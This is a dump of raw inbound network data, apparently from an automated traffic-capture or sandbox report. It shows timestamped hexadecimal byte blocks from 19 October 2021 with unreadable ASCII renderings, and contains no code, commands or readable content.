                                                                                                                                                                                2021-10-19 05:23:31 UTC2731INData Raw: 21 4f 84 e9 9d 40 80 30 54 11 2a 00 4d 93 96 32 a2 6e 41 39 13 b6 60 99 53 e4 44 b2 57 f1 ab a2 18 3c 9e c2 10 70 78 5a ab 20 12 f8 f2 1f 03 cf 9c 96 c1 5f c7 e6 30 59 a7 9e 3c d5 5a ed f6 d6 ff 8c 7b 37 17 75 3e 35 aa dd 03 79 cf d5 ae 5f a2 7f 92 b2 f8 d8 46 be e1 e2 49 b5 de 86 cb 55 b4 82 be d1 5a d9 27 07 68 1d c8 25 78 50 c7 25 b9 ad 91 fe cb da 5f 59 66 52 5d 1c 5f 97 1e 20 bf c5 2d 6b 7f 4f e9 25 d5 b2 fc f7 20 86 f5 f9 1c 57 93 70 70 5c e9 17 06 89 e4 d0 1c 56 68 35 12 66 70 30 bf 9b ae 4a fd f7 f0 68 21 30 72 b2 a8 b5 56 be 09 01 5e 64 41 dd 6c a0 a8 2e 2f 17 4c 49 f1 e4 af 02 a6 8b 31 6d 60 75 4f 65 f2 7f 26 29 cf 69 01 ef 21 26 72 ed e4 fe 5f b3 06 2f ac e3 65 a5 17 8d 4a 67 cd 30 d9 2c 3a a7 dd 92 e6 df 16 fb 5f ff 9a ea 5b ff 3a 85 5e 2a 40
                                                                                                                                                                                Data Ascii: !O@0T*M2nA9`SDW<pxZ _0Y<Z{7u>5y_FIUZ'h%xP%_YfR]_ -kO% Wpp\Vh5fp0Jh!0rV^dAl./LI1m`uOe&)i!&r_/eJg0,:_[:^*@
                                                                                                                                                                                2021-10-19 05:23:31 UTC2747INData Raw: 7d c4 c1 95 51 5a e2 77 12 4c ec 4e f3 02 b9 88 a3 da e1 15 4d 2f 4c de 4f 2d 3b 5e d7 d0 14 2b 62 01 88 b7 16 bf d4 3f c9 83 08 9d 58 84 5f 6d 89 a0 01 54 69 56 01 12 62 60 60 47 e1 60 16 2c 08 fe 1f 40 e4 0f 5b 42 84 7c af e8 27 87 bf 6f c4 90 c7 94 76 d3 20 95 7c cb c2 39 d7 7c 6e e2 13 75 52 6f 5b 5f ef 61 cb b0 fc c2 19 5b 00 3d 84 01 60 1d 99 9c 5c d7 c8 e4 70 24 9f 4c ee 83 27 ed 83 ad 4e dc c4 69 fb e3 f5 06 d4 0b a1 74 10 9f 55 00 e8 89 d5 71 a6 b0 52 5d 53 0c 27 a9 c1 8c 44 dc 3d 40 9f 1e 2c 2d 83 8f dd 1c eb 43 81 25 1e b0 f2 a3 bd e1 6f ad f3 c2 75 1a 01 dd 47 f5 25 98 06 7f 26 8c 4d 45 4b 38 bc 07 49 01 47 37 3b 55 67 6b 8c ed 53 14 b0 b2 1a 00 59 69 8e 7a d7 88 f3 4c bd 9e 78 4f b6 c5 48 e9 78 40 9a a0 c6 15 9b 8f 08 04 4c d3 93 2e b2 80 23
                                                                                                                                                                                Data Ascii: }QZwLNM/LO-;^+b?X_mTiVb``G`,@[B|'ov |9|nuRo[_a[=`\p$L'NitUqR]S'D=@,-C%ouG%&MEK8IG7;UgkSYizLxOHx@L.#
                                                                                                                                                                                2021-10-19 05:23:31 UTC2763INData Raw: b7 57 fa d4 7c 32 e1 0f 5e f8 7b cb 4a a5 7e 30 aa 9e 80 27 a0 fc 03 2d 51 1c 8b 92 c8 55 18 9e ba 5c b1 e0 05 c6 53 2b 81 64 82 75 ce 5f 52 16 04 fd c4 4c 88 a1 fa 40 0d e9 e1 27 02 df 04 18 85 22 39 8d a3 bc 07 af 49 4b 24 09 a7 3c aa c0 17 ef 2e 4a 00 31 0f 23 2c 5d a6 1c 0c 1f 88 65 3d ed 65 58 80 95 79 ec ff 0f c1 44 18 e6 94 70 09 ce f6 c0 0f 07 0a 61 94 80 3b aa d9 2e 87 01 fc 7d 11 e0 ac fd 81 58 57 06 44 90 3f 60 79 0d 0d db da c3 66 3c 3b ef 61 34 e9 ec a5 18 ff 09 00 4a 9c 57 c9 9d 64 10 52 e6 16 de 1d 41 fe 0f 7d 34 4b 2d 30 4c c0 22 da 34 44 77 54 d8 c0 c3 3e 89 bb 86 be 07 68 9d 48 00 2d 55 43 ea ae 39 2f ce 60 48 19 bc 1b d6 b0 31 4e a5 90 fb df b9 64 80 94 13 92 43 8e fd b5 ec 1f 02 ef c3 2d 5e 38 c2 55 20 18 3f a5 1a f3 82 f7 db b2 38 fc
                                                                                                                                                                                Data Ascii: W|2^{J~0'-QU\S+du_RL@'"9IK$<.J1#,]e=eXyDpa;.}XWD?`yf<;a4JWdRA}4K-0L"4DwT>hH-UC9/`H1NdC-^8U ?8
                                                                                                                                                                                2021-10-19 05:23:31 UTC2779INData Raw: ad ab df 66 07 76 35 e6 14 3f e0 2d 49 cb 59 09 29 01 c3 58 f7 6f 96 b2 88 55 dd c8 0c b9 c7 13 6c a8 7a ee dd cf 3a de 7d 96 ab 20 41 39 71 ae 00 61 c1 ed 07 4d 45 81 f5 0c 78 84 af 7f d4 6a 0b 27 93 80 01 f0 71 25 eb 5d f1 d9 5b 02 6b 68 55 92 7d 2a 7f 59 bf 80 9a 63 d5 6f 81 f7 18 a3 4a 7d 56 c7 cb 12 d6 57 cd fc 2f 5c 9e a9 2b fb 7d 0f 7f 2c a2 aa 04 35 e3 ff 64 09 81 43 66 d3 c2 60 74 4e 06 9d 7e d8 80 87 ff f6 49 96 a5 cb 10 f0 02 02 33 fc 75 6c 36 90 28 27 7e 04 a5 02 a1 b8 da 00 9e 75 d6 0b 78 2a 4e 04 e3 89 f2 dc c8 aa b3 93 86 b5 f0 5c b5 76 ba 0e 8d 85 8b 88 89 36 5f 9b 36 d8 14 ef 13 c4 16 f2 06 80 5b dc 0a 9e 3e 2a c9 4b a8 47 1b 09 17 31 2f 0e d6 a0 9a 85 d2 30 0e a4 2a fc 95 10 c8 70 14 73 48 fb ec 8d 5e 2a 60 8c d5 27 f1 bd 18 0c 7c ee b7
                                                                                                                                                                                Data Ascii: fv5?-IY)XoUlz:} A9qaMExj'q%][khU}*YcoJ}VW/\+},5dCf`tN~I3ul6('~ux*N\v6_6[>*KG1/0*psH^*`'|
                                                                                                                                                                                2021-10-19 05:23:31 UTC2795INData Raw: d1 14 0e 16 74 38 e4 02 82 e5 8f 22 ae 06 77 9a f6 df 21 e4 53 4f ff 10 5b b6 1a 61 91 44 27 35 01 7f a8 44 c5 3e 21 80 47 8d 8a 05 d3 3c 0c a0 0a 6c 9e 4a de fd 36 d2 04 fb 29 08 22 78 fd 07 80 ca c2 db 9d 09 f5 8f aa 8f af 80 a1 d8 08 ae 71 b9 6d 30 13 77 d2 fd 8a 57 29 e0 40 aa 9d 1f 2c 08 02 ee 25 5d c5 99 a7 ff 14 76 09 62 2a c2 57 5c 5f 6e ff 04 52 46 47 ee f9 59 81 36 6f 27 61 7c 9e 96 01 1a 0e 78 f5 76 03 0a 0b 0d 01 cb 59 77 ec 71 b5 51 39 b0 3a ca 6d 39 5d 52 77 8b 3c b4 5f 1b f5 c6 d4 92 5e ac be 3a ac 4e e5 a6 2f fe 7b 76 5a ef 29 7b 38 71 f4 ae f7 50 5a ba 75 f2 fa f3 f0 c0 e9 4f 20 e7 ff 16 95 cd 54 a0 bc 7b 07 19 d5 c0 be fc 81 43 c3 31 6b 00 74 8f cc 28 95 49 0c 4b 24 d6 a3 54 aa 2d 3a 9b c1 90 46 cd f0 6e c0 2c a7 c7 c8 e6 85 27 8e cb c0
                                                                                                                                                                                Data Ascii: t8"w!SO[aD'5D>!G<lJ6)"xqm0wW)@,%]vb*W\_nRFGY6o'a|xvYwqQ9:m9]Rw<_^:N/{vZ){8qPZuO T{C1kt(IK$T-:Fn,'
                                                                                                                                                                                2021-10-19 05:23:31 UTC2811INData Raw: fd 97 6f f0 5f a5 01 9d 8b ec 2d aa d6 8c 66 a8 82 17 35 fd f4 8b 72 57 59 81 0d b1 d7 7c 2b ac 81 04 ce 23 bb 3f bd ed 26 2c ac 9f 17 09 29 2a f5 cc 11 b5 cb eb 8a 53 d7 b2 e8 ff 71 0e 44 6c 00 5d 50 53 bb 49 25 8c 48 fe 9c ef d6 ab 3a a5 4e ae 39 c3 2a eb 73 be 8b c4 ef bc 27 e5 aa 8f fe d7 ef da d9 00 56 be 88 63 6d 6f c1 00 ee 01 81 ce 84 bb c6 79 cf 12 05 22 f6 9f 68 f5 e8 67 c3 22 ed 30 06 f2 4f 5e ab 7d 34 6f 52 90 ab f2 d1 d7 ae 3e d7 5a e7 ea 96 bc 9d a6 92 b7 f3 8a 17 56 fa 3d c0 da 38 e9 c9 5c 93 9f 12 ca e1 ed 98 c5 04 92 bb 4f c6 49 4b b8 d8 69 a0 85 e1 bb ba 3d 49 19 84 4a fe c2 bb 74 20 e8 e6 17 69 90 98 f2 fe ff 7a f1 47 3e e3 c7 ce df b8 52 51 e7 5e d0 ed 9b a2 73 77 84 19 30 41 5a 35 c9 0e 38 26 b1 73 58 0a 50 75 1e 76 0d 3d 79 cf 86 d1
                                                                                                                                                                                Data Ascii: o_-f5rWY|+#?&,)*SqDl]PSI%H:N9*s'Vcmoy"hg"0O^}4oR>ZV=8\OIKi=IJt izG>RQ^sw0AZ58&sXPuv=y
                                                                                                                                                                                2021-10-19 05:23:31 UTC2827INData Raw: 0a 23 5f 09 50 75 0b e2 d5 e5 7b 6b f5 9c 60 bd c4 a3 09 0f cb d2 37 67 88 2c c0 ad 7f 9f 3f 13 56 e7 2b a5 af 88 a4 fc 00 da 9c 6e 81 ce 98 db 5f 4a 57 ee 00 c2 ff 23 20 80 01 4b f5 a7 0a 20 cd 5c 2c b6 a5 c5 67 bf 2f 06 61 3d e9 99 e5 c4 ff c5 2f 6a 50 10 21 15 f4 43 01 02 ab 23 5d a2 02 5f 54 e2 60 b9 07 37 d0 c2 18 26 55 5c 55 e1 c4 ff ea f7 45 3d e4 55 a6 d2 97 ef 8e cf 4f ae dd 31 3b 99 a5 10 ff 46 58 47 e1 2e e2 d5 d2 bf f3 98 f2 53 7f 51 fb 40 f3 06 aa 3b f8 f6 50 f7 06 eb 03 09 68 b7 55 29 f3 05 28 d8 1b bf 3c 01 c6 31 4c f8 18 7b 13 96 fc f4 4e f6 03 80 68 49 c6 ce 72 b7 56 7b 5e 97 75 bd 92 ad c6 b9 4a 5f 2e f6 4e b3 71 81 e9 54 ff 6b f0 e7 ee 14 a4 f2 37 87 7e 12 83 db 1f 00 7f fb 58 cf 4b 46 90 7e 0a e3 bf ff 17 a8 00 f1 18 12 64 31 f7 4e 5e
                                                                                                                                                                                Data Ascii: #_Pu{k`7g,?V+n_JW# K \,g/a=/jP!C#]_T`7&U\UE=UO1;FXG.SQ@;PhU)(<1L{NhIrV{^uJ_.NqTk7~XKF~d1N^
                                                                                                                                                                                2021-10-19 05:23:31 UTC2843INData Raw: 4e bb 8e c2 87 cf ab 08 61 09 6d 92 40 fb 8e 62 b7 31 72 ac 40 e2 56 81 c4 b2 31 47 3c ab dd b6 c5 f5 85 1e 24 2a 02 45 a3 9f eb ac 64 80 69 e5 f7 a1 92 2d e6 c2 00 7c 41 9c d0 27 04 44 eb ce 23 61 e8 52 5b aa 20 b5 8f 22 78 4a bf 34 c8 0e bc 7b 60 ba c0 38 4c a1 00 3d 86 61 7d f9 8d 2e 35 5c fc 68 e7 42 13 02 75 d4 d0 79 64 8b 29 87 3b 5c c0 e0 cb 71 1c b2 bf fc c4 51 82 2b 85 da ff b2 c4 4b aa 40 2d e5 67 02 5a 3d 2f 9f 23 82 a8 05 5f 61 46 c1 e2 00 19 6f 7d 0d 40 de d6 3b 9b 4c 01 91 9e f6 cb 05 36 5a e6 08 dd 49 02 60 2e cf d5 eb 00 3b 0a 95 35 a9 75 de 71 0e d4 23 f5 41 12 ea 8c c9 e1 ec 79 40 ed ee 7a 87 16 04 05 91 21 ea 82 50 79 74 2f 8d 54 4d 2f fd 9c 0c 84 88 74 e5 70 02 8c 3d 9d 39 4b e6 53 4c ba 12 b5 3b 53 82 a9 64 e3 a7 8f 0e 10 e1 b3 b9 1e
                                                                                                                                                                                Data Ascii: Nam@b1r@V1G<$*Edi-|A'D#aR[ "xJ4{`8L=a}.5\hBuyd);\qQ+K@-gZ=/#_aFo}@;L6ZI`.;5uq#Ay@z!Pyt/TM/tp=9KSL;Sd
                                                                                                                                                                                2021-10-19 05:23:31 UTC2859INData Raw: 65 ed fe 3c 0d ad 1e be 10 cb fd f1 12 82 1e 08 81 b8 f8 79 49 13 3e 81 7c e8 8b dc d1 90 02 a9 62 d3 83 d8 26 79 87 08 88 ea ae 8b 6e 3f c9 4a 97 6f 04 68 ff d0 eb bd c4 ad 7b b9 ee e4 fa cb d2 92 ef dc df 6f 38 97 4a 57 4a 4e 36 40 a0 03 16 95 df 63 29 cf 41 28 08 6a cd b5 a7 bc 75 b8 62 7a ae 21 26 43 3f 7e ec 3c 87 49 d9 cd 72 7d d1 f2 da d7 d1 46 6b 96 d6 97 65 ac 2f 5d 96 16 9f 65 fb b4 cd fe 3d 7d 6a a8 a3 e4 e4 ee 3f f7 00 93 a2 76 09 4f 96 7b 08 77 58 c3 13 68 55 f2 a8 9c 92 19 94 18 65 7a 39 60 22 a3 18 6e c8 10 74 60 03 23 73 b9 6f 94 14 84 bb d8 de 08 b2 9b 07 ff 3e 5c 6d 06 a4 56 fa 88 2c 8d 79 ad 88 f3 7b 7e 12 a4 38 3c c9 a5 b2 a4 14 d6 f6 14 05 73 e4 d3 fa 81 99 36 2f 08 0a 88 17 23 4b 96 f1 98 2b 9c 70 8d 4e 7c ae ca d2 12 92 d9 ea d9 f9
                                                                                                                                                                                Data Ascii: e<yI>|b&yn?Joh{o8JWJN6@c)A(jubz!&C?~<Ir}Fke/]e=}j?vO{wXhUez9`"nt`#so>\mV,y{~8<s6/#K+pN|
                                                                                                                                                                                2021-10-19 05:23:31 UTC2875INData Raw: 31 83 02 f0 18 8c 0f cf 46 ba c4 8d c8 45 7b 00 30 92 11 e8 df 29 25 76 fa de e0 58 b8 71 9f 46 7c 00 2e cb d3 eb b7 c2 e2 c7 09 23 4c 53 66 d5 68 62 5b 01 88 8e e5 b5 73 fa af 79 23 63 dd 64 b5 be 3c 3c 1f 29 ed 58 c6 12 14 56 40 ab c8 54 24 25 7b 01 79 78 0d f6 ff f9 d0 dc 5a dc 0d 00 31 c9 b3 80 50 4f 09 17 23 f2 12 f5 6c 6e 12 02 0c 98 52 b5 03 5e 48 0f 34 ae 68 27 46 73 d9 e4 9f ee 27 f6 a8 de 09 40 b2 cd a1 0f bb c0 c9 ce 79 0c 91 3e c6 f5 cb 00 e8 49 0b 62 a9 58 13 95 02 79 eb 81 4c 4c 57 08 5d 8c 33 6a e1 3a 92 e9 35 d8 f6 47 da 04 2e 5d ff 74 bf 2c f4 26 42 5d 83 a2 b9 0b f8 09 3e fd 09 39 f7 b7 fe 5c a8 50 84 08 70 01 84 09 b3 22 5e c9 79 68 2c 8c 25 c3 68 de 45 12 2f 3a 48 40 e4 52 87 ac 1a 44 12 dc 62 9c aa 44 21 65 f5 61 a5 4e 09 6e 3c 0c a8
                                                                                                                                                                                Data Ascii: 1FE{0)%vXqF|.#LSfhb[sy#cd<<)XV@T$%{yxZ1PO#lnR^H4h'Fs'@y>IbXyLLW]3j:5G.]t,&B]>9\Pp"^yh,%hE/:H@RDbD!eaNn<
                                                                                                                                                                                2021-10-19 05:23:31 UTC2891INData Raw: e3 89 23 58 9e 29 10 6f 25 3b 3f 98 a3 bb 1f f0 20 d2 08 28 af 88 7f 29 86 00 55 94 aa 5b 17 23 9a bb 4e fe ba 8d 8c 41 1a 7b 88 3a fd f2 80 75 72 cd 09 b4 3a a2 4b fd 14 8d f6 82 78 e1 41 be 7e a6 aa f0 0f 28 f1 47 ff 94 ab 10 28 d7 a6 d8 38 f4 67 4a aa cd e6 cd 5a 3e f4 08 3b 38 da f7 42 c9 e3 e1 a0 74 20 93 21 00 dc 17 75 e4 03 34 88 20 04 a0 6c d8 c7 73 81 5a 74 cb 01 5b 8e 02 4c 77 64 03 12 b1 39 04 bb 32 87 2c 5f 56 ae 62 77 e3 57 90 a8 79 3b 24 c5 30 6c 43 42 e9 17 0c a3 01 af d2 8f 7c 00 eb e4 ea e5 94 4e 52 4c bd 9f 57 b3 3b 1c 08 e9 a0 38 70 bf 7e f4 da f5 59 e4 64 1c dc c4 57 b7 d4 d3 54 97 d7 14 6a 4a 0c fb ca b8 14 e9 60 1a a5 fa 34 b4 b2 5f e0 68 4f 7b 34 02 37 3e a3 a3 8b 51 fc 3b 69 7f 14 09 bf 7e c9 da c9 14 75 d0 a2 35 ba 2b 98 36 c0 1f
                                                                                                                                                                                Data Ascii: #X)o%;? ()U[#NA{:ur:KxA~(G(8gJZ>;8Bt !u4 lsZt[Lwd92,_VbwWy;$0lCB|NRLW;8p~YdWTjJ`4_hO{47>Q;i~u5+6
                                                                                                                                                                                2021-10-19 05:23:31 UTC2907INData Raw: cf 13 a1 5c f1 17 51 36 e6 1e 6a 2c 32 95 97 05 42 6b bf de 30 09 19 3f fb d6 ee dc 12 a1 41 f8 eb db f6 43 1e 82 af 98 fc 56 1a dc 25 4e 07 7b 40 78 10 15 8d 0a 1e e0 1e d0 38 ea 43 ff c4 a2 63 09 ea a4 3f fb c8 48 ed a0 dc d5 ca 4a fe ae 9b b4 09 83 17 03 57 59 bc 6b 66 07 2f 8a 91 55 90 54 37 30 92 08 ff 3e 17 32 bb d0 20 5e 69 03 86 9f f1 22 e2 9a 21 ff 89 42 57 c5 32 58 ce ff e3 0c 0c 12 a9 31 26 0d ca 14 a6 ff 22 0c 18 00 95 c2 2a d1 08 05 2f 5f 09 6a f7 f5 ba 83 8a 59 cf 18 26 ee 41 2c c7 d1 03 2b 56 b2 ab 88 a5 e0 df 7c 62 0f 4c c4 d8 1c c0 ea 32 6f 8c a2 0f fc ae 38 2e 00 82 0d 7b ec 91 00 0b b9 f5 70 0e 26 79 58 00 22 fc 8b a5 c0 16 99 d5 1f 84 2d 7a 00 ca d7 5e 5f e5 43 02 aa ef f8 7c 56 92 89 a8 94 f8 25 b3 3d f9 dd bd 8d 23 7e 97 2c 3a bf 63
                                                                                                                                                                                Data Ascii: \Q6j,2Bk0?ACV%N{@x8Cc?HJWYkf/UT70>2 ^i"!BW2X1&"*/_jY&A,+V|bL2o8.{p&yX"-z^_C|V%=#~,:c
                                                                                                                                                                                2021-10-19 05:23:31 UTC2923INData Raw: ba a6 85 03 72 01 17 03 e4 fd ae 4a 06 08 d0 95 08 01 0a e8 f1 eb 35 09 d2 ea 77 fb a6 0a a4 0c 34 00 b3 20 84 eb 6b f0 76 f5 c1 94 92 d5 79 8d 3a bc 62 13 e7 e6 ff ca 56 3e ef 5a ef 64 0e c1 be 10 c4 ee 5f e5 0c 0f 8e 7f 91 00 da 5e bd 4b e9 2e 58 00 17 01 f3 3a 6c 09 07 61 4d 19 c2 a1 ea 8b 3a fa 6e 42 0b 81 91 f7 67 00 49 54 5e 61 10 a4 fe 0c 8a 01 19 a5 b7 ca 23 98 6e fa 77 e5 e0 1f d4 7e 44 78 8a 90 d5 9d 86 ea 80 2d 24 0e 76 98 60 7c f8 d2 e1 00 3b 2e 6c 0a 45 41 b5 01 a1 a2 6e 78 54 00 ac eb 4d 26 06 e8 6b c4 1a 43 f4 0f 23 a2 91 bf bc 76 a8 58 07 16 62 e8 28 b5 61 e0 df f7 e6 80 a9 51 30 d9 25 1f 5b a8 58 02 b1 6d c8 8f b9 bd f7 85 aa 02 a0 92 9d 97 59 b2 0f df 38 5e a5 7a 7e a7 62 05 66 f8 ff aa 9a 84 22 72 5a 6a b3 16 82 72 1f 01 7d 7c 53 60 56
                                                                                                                                                                                Data Ascii: rJ5w4 kvy:bV>Zd_^K.X:laM:nBgIT^a#nw~Dx-$v`|;.lEAnxTM&kC#vXb(aQ0%[XmY8^z~bf"rZjr}|S`V
                                                                                                                                                                                2021-10-19 05:23:31 UTC2939INData Raw: df 10 ff ec e2 d3 64 9c a1 5c 5e 43 e3 27 71 18 4c e9 c1 a3 68 01 26 55 84 40 24 2f 25 dd e7 c4 60 68 15 99 69 4d 28 87 9e cf 75 c4 cb 41 7d e5 81 69 59 46 b5 30 b2 e0 f1 e9 9d 2e d0 d2 05 ba 53 4b 2a e2 0e b4 ae 2d a4 3a bd 4a a5 ef e3 c4 d7 da 2f 4f a2 51 a4 e4 0b 53 a2 c2 71 11 a5 f2 21 5f 9d bf 17 de 9c 2d 46 9c 64 69 00 fd 9b cb f6 6f 5b 48 e8 84 06 62 34 09 90 c8 09 13 b2 d9 7d 54 03 a0 08 5f 58 cb 5a 25 5a d5 47 09 26 b1 70 e9 3e b1 25 16 9c c0 ec 0b 6a 0a 95 01 44 98 b7 22 30 d3 8f 0c ef cf 8e 06 24 15 25 1c bf f4 8c 09 53 60 fd 16 5a 34 3c b4 18 b4 2d 34 70 e8 9d 5e a7 e3 96 58 87 09 5f 96 90 fa 36 15 98 05 92 a5 01 38 b9 bd 1d 52 f2 48 14 df 9d fc 38 87 10 7f 02 08 41 2b 01 d6 28 69 48 17 3b 34 e0 0c 03 2f a5 9f c6 34 96 6f 4b 9f d4 e8 88 ac 23
                                                                                                                                                                                Data Ascii: d\^C'qLh&U@$/%`hiM(uA}iYF0.SK*-:J/OQSq!_-Fdio[Hb4}T_XZ%ZG&p>%jD"0$%S`Z4<-4p^X_68RH8A+(iH;4/4oK#
                                                                                                                                                                                2021-10-19 05:23:31 UTC2955INData Raw: a5 bb b1 fc 45 f8 19 5a 53 ad 4c 50 50 04 60 fa 24 98 d3 44 15 33 ee 52 bb 40 90 e5 49 12 4b 79 fb ce 8f 14 cf 04 0f f0 45 14 bd c0 9a 49 36 7d 51 92 48 69 8f 80 e3 8e 54 2d c3 60 d0 14 0b 7b 80 98 c1 a6 35 9c 68 9b cd 78 e2 5c e7 83 0f 30 3d 3a c2 2c 7c b7 6b 46 15 f6 2e 13 4d 52 08 f6 a1 7c 1c 2a ea 4c 16 5e e9 8c b4 ae e3 99 13 ee 5d e5 e0 7f e3 64 d6 90 46 07 34 26 4e 6e bf 41 e4 7c d6 dd 6a 6a a7 80 92 a4 c8 50 01 b8 b1 0c 6f 76 35 b5 a7 0b 62 94 75 fe a9 54 97 1d 58 25 d7 17 99 2c 81 ad 79 5d 71 8b 92 5c 57 aa dc 53 83 8a 7c 00 00 36 7b f7 77 25 ad 03 65 f5 3f 0d 40 22 b3 6f a7 60 73 be df 7f 07 05 8e a7 fb 79 50 ff 58 04 06 9f 96 1a 17 e9 b6 44 12 4d eb 25 8b bd ac a4 32 60 d7 09 f9 ba 01 68 5b b7 0b 31 61 11 7e e3 09 f0 55 e8 9d 5f 2c a2 d3 b7 cb
                                                                                                                                                                                Data Ascii: EZSLPP`$D3R@IKyEI6}QHiT-`{5hx\0=:,|kF.MR|*L^]dF4&NnA|jjPov5buTX%,y]q\WS|6{w%e?@"o`syPXDM%2`h[1a~U_,
                                                                                                                                                                                2021-10-19 05:23:31 UTC2971INData Raw: 62 61 0e c6 29 2e 21 e0 34 0a c2 1e 85 00 b0 4a 6e dd d3 aa fc f6 00 27 2c 4b 1c 25 b9 f0 42 03 12 93 99 bc 72 7a 90 3d 95 0f 72 a9 75 81 77 0b 00 8c f5 f3 5a 2c c9 07 60 00 71 0e b6 3f 73 4b e2 df 00 d6 6f c3 11 83 89 8a 9c 07 a4 74 59 f6 fc 70 af ab e3 e4 b8 41 05 36 18 9f 20 06 80 e0 71 2b fc bf 90 14 9a 7e e1 c1 cd ff d1 fb d0 c4 2a 23 f6 8f 9d d3 80 b9 0e ae 92 f0 11 07 30 8e 17 91 27 23 84 d2 fb e2 ec 6e 30 82 24 6d 91 5a 4c 4a 13 ac 26 27 39 7d c6 6a 02 ad dc 17 ec 7b fd 55 56 c4 49 80 a2 72 f7 ef 6f 80 58 82 30 65 77 0c 52 42 6d 30 5b 47 0e e7 43 3d 0b bd 01 fb 5f 5f cc 0f 4e 14 ee cb 07 25 59 d9 88 b4 74 a8 e9 0e df e3 50 16 bd 63 a6 a1 00 50 68 e9 18 fb 4f 58 f7 00 d8 52 ba ff 5c ef 7e c1 00 ea 02 81 ca 55 c9 5f 4f ec e2 16 60 c6 f2 e0 8e 4d 00
                                                                                                                                                                                Data Ascii: ba).!4Jn',K%Brz=ruwZ,`q?sKotYpA6 q+~*#0'#n0$mZLJ&'9}j{UVIroX0ewRBm0[GC=__N%YtPcPhOXR\~U_O`M
                                                                                                                                                                                2021-10-19 05:23:31 UTC2987INData Raw: 1c 04 9c 59 77 a4 8c fe c5 f8 bf 8a 9f 10 fd 22 22 8b 0c 7f 08 c0 e8 2c 6c 27 55 5e 76 53 3e 4f a8 c5 4e ed ff 0b 1c 0d ab fd e7 0b 84 a5 e6 fc 3c 9f 47 75 82 05 2b ff 96 1e 7b d4 80 27 5a 00 d6 1e 4f f5 60 53 5f 96 0f a9 10 59 fa 80 dc 92 8d 7f 09 1e d8 bc 3d 7f 01 dd 22 58 e5 c1 79 d4 26 87 3f 98 de 80 ac 9b 88 25 ad 2e 60 03 03 fa 17 81 0e ec 98 fd 3e f9 09 98 7c 0f 84 84 3a d4 81 ec 72 40 06 16 10 65 9a d3 70 40 14 06 00 2f e4 c2 94 73 6f 3c f9 14 63 a5 76 e3 00 98 d6 22 51 33 2e c1 00 12 27 29 95 01 21 84 8b 3f c0 e3 00 f4 f2 11 ac db d0 63 77 68 00 e1 a8 9a 36 6c 49 32 5e 00 04 5d 60 4d 3e 0d a9 28 75 94 0e bf 79 16 9e 20 cb 7b 3b 49 c7 00 ab d8 b6 e8 46 a1 11 c8 38 4e 69 00 9e 23 fd d5 cf 6a b0 00 09 29 cc 45 2d e7 53 9a 00 77 5f 14 f4 69 41 c5 f3
                                                                                                                                                                                Data Ascii: Yw"",l'U^vS>ON<Gu+{'ZO`S_Y="Xy&?%.`>|:r@ep@/so<cv"Q3.')!?cwh6lI2^]`M>(uy {;IF8Ni#j)E-Sw_iA
                                                                                                                                                                                2021-10-19 05:23:31 UTC3003INData Raw: 6a a9 2f 03 18 7e b7 cd ed b9 e0 3c f6 1a 18 23 d7 0e 0a af 6f e4 05 00 c4 2c 49 7e 0c 46 5c c2 e9 f0 d9 43 00 35 9d df d0 5d 40 31 ad 00 55 ca fe dc 81 e5 90 dd 00 7c 9e a9 85 76 21 ce 32 7c 5e 00 9f 07 1f 92 a4 41 0c 0b 1e bf 88 b4 00 56 0f 8c 96 38 f1 00 f9 f5 64 fa 5d cd c2 fc 00 76 48 88 23 2d 09 84 0b 07 bd 1d dc 7c df 40 1c 64 f1 eb 1e fd e9 82 40 53 f3 95 d5 33 be 00 6f 2a 70 36 d6 c0 8d 5b 1c 62 6e cc c0 05 fb cd 4f cb 34 00 ec 3b 30 43 c0 14 b1 24 3b 1d d4 01 0b 71 f6 b5 cb 9b d8 90 26 e2 a8 3d 06 da 80 e6 3d c4 61 f8 03 3a 7f cc 02 60 3e d2 84 39 e4 fd ba 72 82 58 52 27 41 3e 43 24 58 9e 00 b1 13 99 e2 7b 88 aa e7 02 01 a3 79 3e ca 97 57 80 20 1d 19 c0 37 2c 6b b8 24 0f f1 9c b2 fe 60 8b dd 54 ee e0 3f 00 2e 77 fc 59 d9 bc f2 ea 00 85 d1 3e 86
                                                                                                                                                                                Data Ascii: j/~<#o,I~F\C5]@1U|v!2|^AV8d]vH#-|@d@S3o*p6[bnO4;0C$;q&==a:`>9rXR'A>C$X{y>W 7,k$`T?.wY>
                                                                                                                                                                                2021-10-19 05:23:31 UTC3019INData Raw: 30 8f 22 38 32 77 fb b9 83 2b 04 d2 72 ac 6f 25 93 4c 14 3e 46 cf 44 af 60 1e 18 aa ee ae f7 02 62 10 2a 3d 25 3b fe bb 27 5f 68 90 0e 37 e1 00 4b 5b 11 d3 74 ba f3 60 84 e9 eb c0 55 20 e7 9d f9 76 56 80 0d 12 fe ff 8c 88 5b 79 00 6d 04 0a cd 4a 86 6a 8b 25 a7 b9 44 12 97 76 cd 74 94 44 5b ba 14 df 9e f0 bc 13 5a e2 f3 fd 51 7b da 51 91 1c 53 41 bb e1 5e b4 32 7e f9 dd 93 af 8a c5 77 13 42 29 1e e8 39 ac 57 b5 74 30 da 75 2b c5 f4 91 5a 5f 53 90 e6 12 1d 4f 01 eb 3c 3b 64 bf 4f 19 2f f1 30 da 14 ca 02 57 bf 33 7d 6f 37 c0 2d d6 ab ec 7a c0 0c 59 d1 ff bc 29 9f 62 f2 f5 6e fe 95 55 89 a9 4d cc 2f 56 52 c6 8a 2f ea d2 62 96 14 98 64 5f c5 63 8d da cb 18 2f b4 63 73 4a 14 4e 97 3e 04 4c ce 80 69 3c 8f 79 14 85 4d 55 10 38 65 5c 18 5f f3 11 00 2c b2 04 be 5b
                                                                                                                                                                                Data Ascii: 0"82w+ro%L>FD`b*=%;'_h7K[t`U vV[ymJj%DvtD[ZQ{QSA^2~wB)9Wt0u+Z_SO<;dO/0W3}o7-zY)bnUM/VR/bd_c/csJN>Li<yMU8e\_,[
